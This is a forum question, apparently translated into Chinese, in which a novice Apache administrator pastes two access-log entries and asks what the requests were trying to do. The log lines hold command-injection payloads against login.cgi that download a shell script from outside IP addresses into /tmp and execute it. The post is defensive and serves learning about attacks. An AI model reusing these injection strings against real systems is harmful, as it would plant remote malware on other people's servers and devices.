我正在构建一个新服务器Apache,实际上我正在学习,所以我正在尝试不同的东西。我的安全系统已经完成,但当然我可能会遗漏一些东西,或者,如果没有,我明白今天没有任何系统可以 100% 保护我。那么,为什么我认为有人尝试过我,只是因为我在日志中收到了以下信息:
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
还有更多。我知道有人收到错误 400,这对我来说还不错。所以,实际上我的问题不是他们是否尝试我,因为我认为是,因为这似乎不是对我网站的正常请求。我想得到这个请求的解释来理解和学习。他们实际上想做什么,找到我的登录系统并将其发送给某个人?
PS我已经知道wget你可以下载一些网站,我还发现这login.cgi是一个基于cookie的身份验证程序。
谢谢!